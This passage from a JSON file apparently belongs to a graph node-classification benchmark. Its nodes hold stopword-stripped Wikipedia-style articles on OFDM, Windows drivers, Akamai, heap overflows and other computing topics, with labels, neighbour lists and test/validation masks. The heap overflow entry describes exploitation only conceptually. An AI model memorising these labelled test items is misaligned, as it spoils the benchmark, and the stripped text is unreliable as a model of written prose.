used adsl connections follow ansi t1.413 g.dmt itu g.992.1 standards called discrete multitone modulation dmt dsl achieves high-speed data connections existing copper wires ofdm also used successor standards adsl2 adsl2+ vdsl vdsl2 g.fast adsl2 uses variable subcarrier modulation ranging bpsk 32768qam adsl terminology referred bit-loading bit per tone 1 15 bits per subcarrier long copper wires suffer attenuation high frequencies fact ofdm cope frequency selective attenuation narrow-band interference main reasons frequently used applications adsl modems ofdm used many powerline devices extend digital connections power wiring adaptive modulation particularly important noisy channel electrical wiring medium speed smart metering modems prime g3 use ofdm modest frequencies 30–100 khz modest numbers channels several hundred order overcome intersymbol interference power line environment ieee 1901 standards include two incompatible physical layers use ofdm itu-t g.hn standard provides high-speed local area networking existing home wiring power lines phone lines coaxial cables based phy layer specifies ofdm adaptive modulation low-density parity-check ldpc fec code ofdm extensively used wireless lan man applications including ieee 802.11a/g/n wimax ieee 802.11a/g/n operating 2.4 5 ghz bands specifies per-stream airside data rates ranging 6 54 mbit/s devices use ht mode added 802.11n top 20 mhz per-stream rate increased 72.2 mbit/s option data rates 13.5 150 mbit/s using 40 mhz channel four different modulation schemes used bpsk qpsk 16-qam 64-qam along set error correcting rates 1/2–5/6 multitude choices allows system adapt optimum data rate current signal conditions ofdm also used wimedia/ecma-368 standard high-speed wireless personal area networks 3.1–10.6 ghz ultrawideband spectrum see multiband-ofdm much europe asia adopted ofdm terrestrial broadcasting digital television dvb-t dvb-h t-dmb radio eureka 147 dab digital radio mondiale hd radio t-dmb directive european commission television services transmitted viewers european community must use transmission system standardized recognized european standardization body standard developed codified dvb project digital video broadcasting dvb framing structure channel coding modulation digital terrestrial television customarily referred dvb-t standard calls exclusive use cofdm modulation dvb-t widely used europe elsewhere terrestrial digital tv ground segments digital audio radio service sdars systems used xm satellite radio sirius satellite radio transmitted using coded ofdm cofdm word coded comes use forward error correction fec question relative technical merits cofdm versus 8vsb terrestrial digital television subject controversy especially european north american technologists regulators united states rejected several proposals adopt cofdm-based dvb-t system digital television services instead opted 8vsb vestigial sideband modulation operation one major benefits provided cofdm rendering radio broadcasts relatively immune multipath distortion signal fading due atmospheric conditions passing aircraft proponents cofdm argue resists multipath far better 8vsb early 8vsb dtv digital television receivers often difficulty receiving signal also cofdm allows single-frequency networks possible 8vsb however newer 8vsb receivers far better dealing multipath hence difference performance may diminish advances equalizer design cofdm also used radio standards digital audio broadcasting dab standard digital audio broadcasting vhf frequencies digital radio mondiale drm standard digital broadcasting shortwave medium wave frequencies 30 mhz drm+ recently introduced standard digital audio broadcasting vhf frequencies 30 174 mhz usa uses alternate standard proprietary system developed ibiquity dubbed hd radio however uses cofdm underlying broadcast technology add digital audio medium wave fm broadcasts digital radio mondiale hd radio classified in-band on-channel systems unlike eureka 147 dab digital audio broadcasting uses separate vhf uhf frequency bands instead band-segmented transmission orthogonal frequency division multiplexing bst-ofdm system proposed japan isdb-t isdb-tsb isdb-c broadcasting systems improves upon cofdm exploiting fact ofdm carriers may modulated differently others within multiplex forms cofdm already offer kind hierarchical modulation though bst-ofdm intended make flexible 6 mhz television channel may therefore segmented different segments modulated differently used different services possible example send audio service segment includes segment composed number carriers data service another segment television service yet another segment—all within 6 mhz television channel furthermore may modulated different parameters example audio data services could optimized mobile reception television service optimized stationary reception high-multipath environment ultra-wideband uwb wireless personal area network technology may also use ofdm multiband ofdm mb-ofdm uwb specification advocated wimedia alliance formerly multiband ofdm alliance mboa wimedia alliance two merged one competing uwb radio interfaces fast low-latency access seamless handoff orthogonal frequency division multiplexing flash-ofdm also referred f-ofdm based ofdm also specified higher protocol layers developed flarion purchased qualcomm january 2006 flash-ofdm marketed packet-switched cellular bearer compete gsm 3g networks example 450 mhz frequency bands previously used nmt-450 c-net c450 1g analogue networks mostly decommissioned europe licensed flash-ofdm operators finland license holder digita began deployment nationwide 450 wireless network parts country since april 2007 purchased datame 2011 february 2012 datame announced would upgrade 450 mhz network competing cdma2000 technology slovak telekom slovakia offers flash-ofdm connections maximum downstream speed 5.3 mbit/s maximum upstream speed 1.8 mbit/s coverage 70 percent slovak population flash-ofdm network switched majority slovakia 30 september 2015 t-mobile germany used flash-ofdm backhaul wi-fi hotspots deutsche bahn ice high speed trains 2005 2015 switching umts lte american wireless carrier nextel communications field tested wireless broadband network technologies including flash-ofdm 2005 sprint purchased carrier 2006 decided deploy mobile version wimax based scalable orthogonal frequency division multiple access sofdma technology citizens telephone cooperative launched mobile broadband service based flash-ofdm technology subscribers parts virginia march 2006 maximum speed available 1.5 mbit/s service discontinued april 30 2009 ofdm become interesting technique power line communications plc area research wavelet transform introduced replace dft method creating orthogonal frequencies due advantages wavelets offer particularly useful noisy power lines instead using idft create sender signal wavelet ofdm uses synthesis bank consisting formula_36-band transmultiplexer followed transform function receiver side analysis bank used demodulate signal bank contains inverse transform followed another formula_36-band transmultiplexer relationship transform functions example w-ofdm uses perfect reconstruction cosine modulated filter bank pr-cmfb extended lapped transform elt used wavelet tf thus formula_42 formula_43 given two functions respective inverses used modulate demodulate given input sequence case dft wavelet transform creates orthogonal waves formula_47 formula_48 ... formula_49 orthogonality ensures interfere sent simultaneously receiver formula_50 formula_51 ... formula_52 used reconstruct data sequence w-ofdm evolution standard ofdm certain advantages mainly sidelobe levels w-ofdm lower results less ici well greater robustness narrowband interference two properties especially useful plc lines n't shielded em-noise creates noisy channels noise spikes comparison two modulation techniques also reveals complexity algorithms remains approximately",
    "neighbors": [
      4609,
      9863,
      9098,
      10381,
      1550,
      7698,
      2968,
      8600,
      5020,
      5664,
      11686,
      2994,
      5304,
      1977,
      7490,
      3140,
      7108,
      7498,
      9038,
      4691,
      3040,
      1121,
      2920,
      361,
      7400,
      5497
    ],
    "mask": "Test"
  },
  {
    "node_id": 8161,
    "label": 2,
    "text": "Windows_Driver_Model:windows driver model computing windows driver model wdm also known one point win32 driver model framework device drivers introduced windows 98 windows 2000 replace vxd used older versions windows windows 95 windows 3.1 well windows nt driver model wdm drivers layered stack communicate via i/o request packets irps microsoft windows driver model unified driver models windows 9x windows nt product lines standardizing requirements reducing amount code needed written wdm drivers run operating systems earlier windows 98 windows 2000 windows 95 windows nt 4.0 windows 3.1 conforming wdm drivers binary compatible source-compatible across windows 98 windows 98 second edition windows windows 2000 windows xp windows server 2003 windows vista backwards compatibility x86-based computers wdm drivers designed forward-compatible wdm driver run version windows newer driver initially written would mean driver take advantage new features introduced new version wdm generally backward-compatible wdm driver guaranteed run older version windows example windows xp use driver written windows 2000 make use new wdm features introduced windows xp however driver written windows xp may may load windows 2000 wdm exists intermediary layer windows 2000 kernel-mode drivers introduced increase functionality ease writing drivers windows although wdm mainly designed binary source compatible windows 98 windows 2000 may always desired specific drivers developed either operating system windows drivers model wdm devices microsoft implements approach kernel mode drivers unique windows operating systems wdm implements layered architecture device drivers every device computer served stack drivers however every driver stack chain isolate hardware independent features driver beneath drivers stack need interact directly one another wdm defines architecture device procedures range devices display network card known network driver interface specification ndis ndis architecture layered network drivers include lower-level drivers manage hardware upper-level drivers implement network data transport transmission control protocol tcp wdm defines three types device drivers driver stacks given device contain types device drivers three wdm device driver types bus driver every bus mainboard one bus driver primary responsibility identification devices connected bus responding plug play events microsoft provide bus drivers part operating system pci pnpisa scsi usb firewire function driver principal driver device provides operational interface device handling read write operations function drivers written device vendors interaction hardware depend specific bus driver present windows operating system filter driver driver optional modify behaviour device input output requests drivers implemented lower-level upper-level filter drivers function drivers bus drivers often implemented driver/minidriver pairs practice either class/miniclass port/miniport pair bus drivers devices attached bus implemented class drivers hardware-agnostic support operations certain type device windows operating systems include number class drivers kbdclass.sys driver keyboards miniclass drivers hand supplied vendor device support device specific operations particular device given class port drivers support general input/output i/o operations peripheral hardware interface core functionality port drivers mandated operating system windows operating systems integrate variety port drivers example i8042prt.sys port driver 8042 microcontroller connects ps/2 keyboards mainboard peripheral bus miniport drivers like miniclass drivers supplied hardware vendors support device specific operations peripheral hardware connected port mainboard driver processes i/o request device corresponding object loaded main memory device object created windows operating system associated device class device objects contain structures type device_object store pointers driver run time pointers used locate driver dispatch routine member functions wdm driver stack filter driver device object known upper filter receive i/o request packet irp device i/o manager upper filter driver serve request locate object driver one step driver stack irp passed driver stack calling function iocalldrive processed function driver device object also known functional device object function driver device object turn may pass irp lower filter another filter device object irp may passed bus driver operates physical device object bus driver object bottom driver stack interacts hardware abstraction layer part windows operating system kernel allows windows operating systems run variety processors different memory management unit architectures variety computer systems different i/o bus architectures execution irp finished driver objects stack returns request back i/o manager result status flag wdm framework developed microsoft simplify communication operating system drivers inside kernel windows operating systems drivers implemented dynamic link libraries .dll .sys files wdm compliant drivers must follow rules design initialisation plug-and-play power management memory allocation practice wdm driver programmers reuse large pieces code building new object orientated drivers means drivers wdm stack may contain residual functionality documented specifications drivers passed microsoft quality test digitally signed microsoft microsoft hardware compatibility tests driver development kit include reliability stress tests device driver designed specific hardware component may allow another device function basic functionality hardware device class similar functionality video card class example allows microsoft basic display adapter driver work wide variety video cards however installing wrong driver device mean full functionality device used may result poor performance destabilization windows operating system hardware device vendors may release updated device drivers particular windows operating systems improve performance add functionality fix bugs device working expected latest device drivers downloaded vendor website installed device drivers designed particular windows operating system versions device drivers previous version windows may work correctly versions many device drivers run kernel mode installing drivers previous operating system version may destabilise windows operating system migrating computer higher version windows operating system therefore requires new device drivers installed hardware components finding date device drivers installing windows 10 introduced complications migration process common device driver compatibility issues include 32-bit device driver required 32-bit windows operating system 64-bit device driver required 64-bit windows operating system 64-bit device drivers must signed microsoft run kernel mode unrestricted access computer hardware operating systems prior windows 10 microsoft allowed vendors sign 64-bit drivers assuming vendors undertaken compatibility tests however windows 10 64-bit drivers need signed microsoft therefore device vendors submit drivers microsoft testing approval driver installation package includes files .inf directory files package need installed otherwise installation device driver may fail operating system versions windows 10 files necessary driver installation included package requirement consistently enforced device driver installers user interface gui often requiring user configuration input absence user interface mean installation device driver successful besides windows 10 device drivers allowed include user interface network driver interface specification ndis 10.x used network devices windows 10 operating system network device drivers windows xp use ndis 5.x may work subsequent windows operating systems performance reasons network device drivers implement ndis 6.0 higher similarly wddm driver model windows vista replaces xpdm used graphics drivers device manager control panel applet microsoft windows operating systems allows users view control hardware attached computer allows users view modify hardware device properties also primary tool manager device drivers windows driver model significant improvement vxd windows nt driver model used criticised driver software developers significantly following also number concerns quality documentation samples microsoft provided issues microsoft released new set frameworks top wdm called windows driver frameworks wdf formerly windows driver foundation includes kernel-mode driver framework kmdf user-mode driver framework umdf windows vista supports pure wdm newer wdf kmdf also available download windows xp even windows 2000 umdf available windows xp",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      3109,
      1577,
      4143,
      9263,
      3122,
      11316,
      1077,
      6709,
      8246,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      5225,
      10359,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      10900,
      10902,
      11414,
      3224,
      3235,
      4771,
      7846,
      10924,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      11498,
      3821,
      10991,
      2804,
      8445,
      6927,
      8976,
      9491,
      11030,
      3864,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      9009,
      11570,
      315,
      5952,
      1348,
      844,
      847,
      3923,
      1366,
      7519,
      10079,
      2401,
      11616,
      9066,
      3958,
      2943,
      9609,
      9612,
      8080,
      7064,
      9114,
      10654,
      8607,
      11683,
      3496,
      4010,
      10157,
      6584,
      2493,
      7629,
      1501,
      6114,
      4074,
      9196,
      4590,
      11247,
      499,
      3573,
      9205,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8162,
    "label": 9,
    "text": "SimulationX:simulationx simulationx cae software application running microsoft windows physical simulation technical systems developed sold esi iti gmbh dresden germany mid 1980s veb mikromat dresden developed program dos design controlled feed axis systems perform hydraulic calculations 1993 iti gmbh founded former mikromat employees 1990 introduced simulation tool microsoft windows designed dynamic calculations drive systems iti-sim 1 release iti-sim 2 1995 software also allowed fluid simulations 2002 newly developed application simulationx based object-oriented description language modelica introduced market year 2007 iti-sim version 3.8 completely replaced simulationx since beginning 2016 iti belongs esi group operates name esi iti gmbh simulation models created basis discrete network approach means system broken logical parts linked specific connections sub-systems represented preconfigured custom model elements organized domain-specific custom model libraries sub-models parameterized connected models created either graphical user interface using modelica command lines model libraries obtained modular packages software producer various libraries available basic models corresponding physical domains well libraries advanced models specific applications industries depending objective user choose 1d 2d 3d model elements respect modeling simulation parameterization requirements modelica-based third-party custom-built libraries also integrated simulationx simulationx libraries include simulationx supports modelica modeling language simulate individually created realistic sub- models models modelica standard library ones purely based modelica language definition executed simulationx provides open comprehensive cax-interfaces external programs different purposes applications e.g cae vehiclesim carsim bikesim trucksim cad solid edge unigraphics nx solidworks creo elements/pro autodesk inventor catia v5 cam computer-aided optimization e.g isight modefrontier optimus optislang optiy fea/fem abaqus ansys comsol multiphysics msc nastran cfd co-simulation provides general interface used link simulationx cae tools predefined setups particular realizations msc.adams simpack matlab/simulink fluent cadmould etc. coupling ensures data exchange tools simulation software tools holistic structural system analysis equilibrium computation natural frequencies vibration modes input-output analysis linking simulation model databases available com interface allows communication simulationx windows applications user-defined batch runs embedded simulation parameter studies optimizations code-export features support generation c source code seamless model integration hardware-in-the-loop hil applications rapid control prototyping functional mock-up virtual machine throughout stages modern system design processes engineers scientists work variety seamlessly integrated tools connection simulationx real-time testing simulation platforms labview ni veristand dspace etas labcar scale-rt heavily increases productivity design cycle shortens time-to-market new products simulationx supports creation import functional mock-up units defined functional mock-up interface standard development started modelisar project standardized interfaces facilitate platform-independent exchange simulation models increase flexibility connection external simulation tools models simulationx used designing modeling analyzing dynamic behavior complex mechatronic systems well virtual tests many industries research education including automotive sector railway shipbuilding heavy machinery mining power generation building technology aerospace defense mechanical engineering medical engineering oil gas precision instruments home appliances well consumer electronics simulationx widely used education research worldwide",
    "neighbors": [
      9376,
      5380,
      4454,
      587,
      5356,
      6797,
      7341,
      3567,
      7983,
      8079,
      10764,
      2804,
      4792,
      1917,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 8163,
    "label": 3,
    "text": "The_Wizard_of_Oz_(1985_video_game):wizard oz 1985 video game wizard oz illustrated text adventure game developed published windham classics apple ii commodore 64 ms-dos msx 1985 adaptation books wonderful wizard oz marvelous land oz wizard oz positively received press including ii computing ahoy commodore power play",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 8164,
    "label": 7,
    "text": "Distributed_Common_Ground_System:distributed common ground system distributed common ground system dcgs system produces military intelligence multiple military branches u.s. air force use system produces intelligence collected u-2 dragonlady rq-4 global hawk mq-9 reaper mq-1 predator previous system similar use deployable ground station dgs first deployed july 1994 subsequent version dgs developed 1995 2009 although officially designated weapons system consists computer hardware software connected together computer network devoted processing dissemination information images 480th intelligence surveillance reconnaissance wing air combat command operates maintains usaf system plan envisioned 1998 develop interoperable systems army navy addition air force 2006 version 10.6 deployed air force version known dcgs-a developed army 2010 report general michael t. flynn program intended use cloud computing easy use ipad soldiers years commonly using april 2011 project manager colonel charles wells announced version 3 army system code named griffin deployed us war afghanistan january 2012 united states army communications-electronics research development engineering center hosted meeting based dcgs-a early experience brought together technology providers hope developing integrated systems using cloud computing open architectures compared previously specialized custom-built systems major contractor lockheed martin computers supplied silicon graphics international chippewa falls wisconsin office software known analyst notebook originally developed i2 limited included dcgs-a ibm acquired i2 2011 us army personnel reported using palantir technologies product improve ability predict locations improvised explosive devices april 2012 report recommending study initial success palantir software rated easy use flexibility wide number data sources dcgs-a july 2012 congressman duncan d. hunter california state palantir based complained us dod obstacles wider use although limited test august 2011 test evaluation command recommended deployment operation problems dcgs-a included baseline system operationally effective reboots average every 8 hours set improvements identified november 2012 press reported shortcomings uncovered general genaro dellarocco tests ambitious goal integrating 473 data sources 75 million reports proved challenging spending estimated 2.3 billion army system alone may 2013 politico reported palantir lobbyists anonymous returning veterans continued advocate use software despite interoperability limits particular members special forces us marines required use official army system similar stories appeared publications army representatives major general mary a. legere citing limitations various systems congressman hunter member house armed services committee required review program two members congress sent open letter secretary defense leon panetta senate defense appropriations subcommittee included testimony army chief staff general ray odierno 130th engineer brigade united states found system unstable slow friendly major hindrance operations equivalent system united states navy planned initial deployment 2015 within shipboard network called consolidated afloat networks enterprise services canes 2016 early testing announced 2009 aboard aircraft carrier portion software distributed data framework dcgs integration backbone dib version 4 submitted open-source software repository codice foundation github framework new dib version 4 replacing legacy dib portal ozone widget framework interface written java programming language distributed common ground system-army dcgs-a united states army primary system post data process information disseminate intelligence surveillance reconnaissance isr information threat weather terrain echelons dcgs-a provides commanders ability task battle-space sensors receive intelligence information multiple sources august 17 2011 upi article quoted i2 chief executive officer robert griffin commented dcgs-a best-of-breed approach development article detailed army contracting i2 analyst notebook software open architecture analyst notebook supports army strategy employ integrate best-of-breed solutions across industry meet dynamic needs users face field daily basis february 1 2012 article army web page quoted mark kitz dcgs-a technical director dcgs-a uses latest cloud technology rapidly gather collaborate share intelligence data multiple sources deliver common operating picture dcgs-a able rapidly adapt changing operational environments leveraging iterative development model open architecture allowing collaboration multiple government industry academic partners july 2012 article signal magazine monthly publication armed forces communications electronics association promoted dcgs-a taking advantage technological environments young soldiers familiar article quoted dcgs-a program manager col. charles wells systems benefits article also included lockheed martin dcgs-a program manager milwaukee journal sentinel published article may 4 2012 wisconsin-located companies helping dcgs-a cloud computing technology article promoted speed cloud computing processes intelligence cost savings analyzing data field u.s. army released 2011 army posture statement march 2 included statement dcgs-a dcgs-a connects tactical operational theater-level commanders hundreds intelligence intelligence-related data sources classification levels allows focus efforts entire isr community information requirements ground commanders describe dcgs-a unwieldy unreliable hard learn difficult use supporting alternative software palantir technologies palantir software supports small unit situational awareness sufficiently funded support broader role dcgs-a fulfills",
    "neighbors": [
      4194,
      6858,
      6539,
      6419,
      11221,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8165,
    "label": 4,
    "text": "IT_Underground:underground underground one biggest hacking conferences middle east europe series events dedicated information security held warsaw prague 2009 underground organised germany conference focused security aim show participants defend improve security lectures conducted byol bring laptop mode aimed participants brought computers therefore actively participate sessions attendees able boot machines test networks using techniques described lecturers try defend attacks performed others underground website",
    "neighbors": [
      7449,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 8166,
    "label": 1,
    "text": "Dictionary_of_Scottish_Architects:dictionary scottish architects dictionary scottish architects publicly available online database provides biographical information architects known worked scotland 1840 1980 lists works launched 2006 compiled team led professor david walker emeritus professor school art history university st andrews database includes known works architects based scotland scottish works english irish architects included database available free charge managed fully funded historic environment scotland replaced historic scotland 2015",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 8167,
    "label": 4,
    "text": "Heap_overflow:heap overflow heap overflow heap overrun type buffer overflow occurs heap data area heap overflows exploitable different manner stack-based overflows memory heap dynamically allocated application run-time typically contains program data exploitation performed corrupting data specific ways cause application overwrite internal structures linked list pointers canonical heap overflow technique overwrites dynamic memory allocation linkage malloc meta data uses resulting pointer exchange overwrite program function pointer typical example older versions linux two buffers allocated next heap writing beyond boundary first buffer allows overwriting meta data second buffer setting in-use bit zero second buffer setting length small negative value allows null bytes copied program calls free first buffer attempt merge two buffers single buffer happens buffer assumed freed expected hold two pointers fd bk first 8 bytes formerly allocated buffer bk gets written fd used overwrite pointer accidental overflow may result data corruption unexpected behavior process uses affected memory area operating systems without memory protection could process system deliberate exploit may result data specific location altered arbitrary way arbitrary code executed example microsoft jpeg gdi+ buffer overflow vulnerability could allow remote execution code affected machine ios jailbreaking often uses heap overflows gain arbitrary code execution usually kernel exploits achieve ability replace kernel one jailbreak provides buffer overflows primarily three ways protect heap overflows several modern operating systems windows linux provide implementation three since version 2.3.6 gnu libc includes protections detect heap overflows fact example checking pointer consistency calling unlink however protections prior exploits almost immediately shown also exploitable addition linux included support aslr since 2005 although pax introduced better implementation years also linux included support nx-bit since 2004 microsoft included protections heap resident buffer overflows since april 2003 windows server 2003 august 2004 windows xp service pack 2 mitigations safe unlinking heap entry header cookies later versions windows vista server 2008 windows 7 include removal commonly targeted data structures heap entry metadata randomization expanded role heap header cookie randomized heap base address function pointer encoding termination heap corruption algorithm variation normal data execution prevention dep aslr also help mitigate attack",
    "neighbors": [
      928,
      1474,
      3234,
      4836,
      7717,
      8551,
      4074,
      939,
      6829,
      3473,
      4562,
      4689,
      11537,
      7734,
      1820,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 8168,
    "label": 9,
    "text": "UBot_Studio:ubot studio ubot studio web browser automation tool allows users build scripts complete web-based actions data mining web testing social media marketing scripts created via command window inside ubot studio browser compiled separate executable files “ internet bots ” run computer called “ infrastructural piece botting world ” ubot studio developed seth turin media inc. first released 2009 ubot studio web automation product designed internet marketing automation advanced versions ubot studio contain drag-and-drop user interface designer bots image recognition task scheduler ability automate non web-based applications 2013 company introduced api creation plugins allow addition non-standard functionality software 2015 company released ubot studio stealth new browser using cef framework additional features",
    "neighbors": [
      5356,
      5380,
      9780,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 8169,
    "label": 5,
    "text": "Waterfox:waterfox waterfox open-source web browser x64 arm64 systems intended speedy ethical maintain support legacy extensions dropped firefox forked official releases windows including portable version macos linux android waterfox based firefox compiled using various compilers using intel math kernel library streaming simd extensions 3 advanced vector extensions linux builds built clang waterfox continuing support long-standing xul xpcom add-on capability firefox removed version 57 features waterfox currently waterfox first released march 27 2011 64-bit windows mac build introduced may 14 2015 release version 38.0 linux build introduced december 20 2016 release version 50.0 android build first introduced version 55.2.2 version 29.0 released july 22 2015 build ios may 7 2019 68.0a1 first alpha version next generation waterfox released may 12 2015 november 12 2015 waterfox exclusive charity search engine called storm ecosia default search engine bing search engine default one",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      9281,
      5707,
      10834,
      5205,
      6231,
      8281,
      6747,
      6237,
      1642,
      9834,
      10860,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      9394,
      9908,
      7861,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      9451,
      11000,
      8443,
      9987,
      7943,
      1295,
      1807,
      7951,
      2836,
      278,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      7488,
      833,
      10057,
      11082,
      2893,
      10078,
      11112,
      8557,
      7543,
      6528,
      3971,
      3462,
      8584,
      4490,
      6028,
      10126,
      7572,
      5026,
      4013,
      944,
      5054,
      8126,
      9152,
      6086,
      4048,
      5078,
      479,
      482,
      10722,
      5605,
      487,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      2045,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 8170,
    "label": 7,
    "text": "Akamai_Technologies:akamai technologies akamai technologies inc. american content delivery network cdn cloud service provider headquartered cambridge massachusetts united states akamai content delivery network one world largest distributed computing platforms responsible serving 15 30 web traffic company operates network servers around world rents capacity servers customers want websites work faster distributing content locations close user user navigates url akamai customer browser redirected one akamai copies website akamai technologies entered 1998 mit 50k competition business proposition based research consistent hashing selected one finalists august 1998 developed working prototype help jonathan seelig randall kaplan began taking steps incorporate company late 1998 early 1999 group business professionals joined founding team notably paul sagan former president new media time inc. george conrades former chairman chief executive officer bbn corp. senior vice president u.s. operations ibm conrades became chief executive officer akamai april 1999 led company start-up sustained profitability positive free cash-flow turning reins sagan 2005 company launched commercial service april 1999 listed nasdaq stock market october 29 1999 july 1 2001 akamai added russell 3000 index russell 2000 index september 11 2001 co-founder daniel m. lewin died stabbing flight september 11th attacks age 31 lewin aboard american airlines flight 11 first plane crash world trade center 2005 paul sagan named chief executive officer akamai sagan worked differentiate akamai competitors expanding company breadth services leadership company grew 1.37 billion revenues sagan served chief executive officer co-founder current ceo tom leighton elected position 2013 akamai headquarters kendall square started technology square expanded multiple buildings cambridge center consolidating offices purpose-built building 145 broadway late 2019 early 2020 akamai intelligent platform distributed cloud computing platform operates worldwide network 240,000 servers deployed 120 countries servers reside 1,500 world networks gathering real-time information traffic congestion trouble spots akamai server equipped proprietary software uses complex algorithms process requests nearby users serve requested content content delivery process begins user submitting request browser user enters url dns request triggered ip address retrieved ip address browser contact web server directly subsequent requests content delivery network structure domain name url translated mapping system ip address edge server serve content user akamai delivers web content intelligent platform transparently mirroring elements html css software downloads media objects customers servers akamai server automatically picked depending type content user network location receiving content akamai server close user allows faster download times less vulnerability network congestion akamai claims provide better scalability delivering content last-mile servers close end-users avoiding middle-mile bottleneck internet download delivery product line includes http downloads large downloadable objects customizable application consumers analytics tools metrics monitor report download process addition using akamai servers akamai delivers content end-users computers form peer-to-peer networking users request download large files served system prompts download install akamai netsession interface download manager used reduce download time increase quality however software operates merely download manager delivering content internet user computer also peer-to-peer server delivering content cached user computer users computers akamai network operations command center nocc used proactive monitoring troubleshooting servers global akamai network nocc provides real time statistics akamai web traffic traffic metrics update automatically provide view internet traffic conditions akamai servers customer websites state internet report quarterly report akamai releases based data gathered intelligent platform provides global internet statistics connection speed broadband adoption attack traffic network connectivity mobile connectivity akamai ’ data visualization tools display data moving across internet real-time viewers able see global web conditions malicious attack traffic internet connectivity addition net usage indices monitor global news consumption industry specific traffic mobile trends akamai also offers internet visualization application allows users view real-time data mobile device october 9 2013 akamai announced open initiative 2013 akamai edge conference open allows customers partners develop customize way interact akamai intelligent platform key components open include system development operations integration real-time big data integration single-point user interface akamai technologies owns 60 domains primary domains uses include july 21 1999 macworld expo new york apple akamai announced strategic partnership build apple new media network quicktime tv qtv based quicktime streaming server companies later announced apple made 12.5 million investment company previous month apple continues use akamai primary content delivery network wide range applications including software downloads apple website quicktime movie trailers itunes store september 1999 microsoft akamai formed strategic relationship incorporate windows media technology akamai freeflow service well facilitate porting freeflow product windows platform relationship exists day microsoft azure offers akamai along verizon options standard cdn service arabic news network al-jazeera customer march 28 2003 april 2 2003 akamai decided end relationship network english-language managing editor claimed due political pressure june 2008 newsmarket teamed akamai accelerate dynamic content applications global media ahead beijing olympics bbc iplayer uses akamai stream recorded live programs focused xml playlist entire china central television website cctv.com including streaming video hosted akamai edge servers since late 2009 hulu uses akamai hosting video mit opencourseware utilizes akamai edgesuite content delivery network trend micro uses akamai housecall antivirus application valve corporation steam software service uses akamai content delivery network storing screenshots icons uploaded users akamai provided streaming services espn star india course icc cricket world cup 2011 rackspace cloud files use akamai content delivery network cdn storing customer files customers include adobe systems airbnb amd autotrader.com cos espn great courses hewlett-packard hilton worldwide ibm j. c. penney mtv networks nasa national academy recording arts sciences nbc sports pearson education red bull gmbh red hat sony playstation yahoo august 2017 nintendo launched new game console mobile gaming application simultaneously around world via akamai media delivery solutions one akamai patents covers method delivering electronic data using content delivery network internet web site proprietors content providers contract akamai deliver web sites content individual internet users patented method permits large files video music files stored akamai servers accessed servers internet users increases speed internet users access content web sites unfortunately akamai patent written way called permitted actions multiple persons entities—such content provider customer company providing cdn service akamai competitor limelight chose operate allegedly infringing service manner—it performed steps patented process customers performed so-called tagging step interpretation patent law time akamai decided sue limelight patent infringement method patent could held infringed single actor performed steps court therefore overturned 40 million jury verdict akamai favor akamai initially lost case even taking supreme court supreme court returned case united states court appeals federal circuit however invitation re-evaluate rule chose steps method performed single actor infringement remand federal circuit considered matter en banc active judges circuit modified rule held patent could also directly infringed alleged infringer conditions participation activity receipt benefit upon performance step steps patented method establishes manner timing performance basis federal circuit reinstated 40 million jury verdict said akamai presented substantial evidence demonstrating limelight conditions customers use content delivery network upon customers performance steps limelight perform considered substantial change patent law discussion case see akamai techs. inc. v. limelight networks inc. national security agency federal bureau investigation reportedly used facebook akamai content delivery network cdn collect information facebook users report appears show intelligence analysts intercepting communications facebook cdn provider indicate akamai complicit process according researchers universities cambridge california-berkeley university college london international computer science institute-berkeley akamai blocking access web sites visitors using tor feature known 'network lists optional implemented customers akamai legitimate feature common many major vendors provide network security feeds emerging threats provides feed free",
    "neighbors": [
      10755,
      9732,
      517,
      1541,
      1549,
      7697,
      19,
      11289,
      8735,
      3112,
      6186,
      6700,
      1074,
      9784,
      8253,
      64,
      576,
      8779,
      8783,
      7248,
      4689,
      4180,
      10838,
      4194,
      9826,
      5733,
      8806,
      3691,
      2676,
      6264,
      2686,
      6783,
      7806,
      8833,
      10368,
      10878,
      8842,
      5784,
      1177,
      4251,
      2717,
      2207,
      11430,
      171,
      2735,
      3248,
      5295,
      4283,
      7869,
      6851,
      1223,
      713,
      3790,
      7887,
      7378,
      3286,
      9430,
      8921,
      3293,
      231,
      2282,
      3819,
      1772,
      9455,
      11510,
      8441,
      3323,
      8956,
      5373,
      2819,
      5384,
      1290,
      9999,
      784,
      4388,
      10023,
      4399,
      2363,
      2365,
      2366,
      9021,
      9022,
      1346,
      3395,
      10562,
      838,
      331,
      2388,
      6495,
      9063,
      2409,
      10090,
      10602,
      3948,
      11629,
      10608,
      2945,
      6018,
      6023,
      6539,
      1935,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      3520,
      6080,
      8640,
      2502,
      456,
      1482,
      464,
      6608,
      2003,
      10708,
      8662,
      9174,
      7133,
      9182,
      479,
      4068,
      5093,
      2023,
      2034,
      5619,
      7154,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 8171,
    "label": 4,
